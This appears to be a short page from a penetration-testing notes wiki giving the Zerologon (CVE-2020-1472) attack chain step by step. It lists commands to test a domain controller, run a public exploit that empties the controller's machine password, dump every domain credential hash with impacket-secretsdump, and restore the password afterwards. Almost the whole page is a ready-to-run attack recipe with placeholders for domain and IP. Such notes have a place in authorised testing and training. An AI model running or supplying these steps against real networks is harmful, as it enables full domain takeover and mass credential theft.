zero logon exploit

Information

This exploit changes the DC Password to an empty string.

SecuraBV/CVE-2020-1472/zerologon_tester.py
python3 zerologon_tester.py DOMAIN DC_IP

Exploit

Clone dirkjanm/CVE-2020-1472
python3 exploit.py DOMAIN DC_IP

Dump hashes

impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP - no-pass

Restore

impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP
Note the plaintext password plain_password_hex
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX

Previousresponder Nextuntested tools

Last updated 2 years ago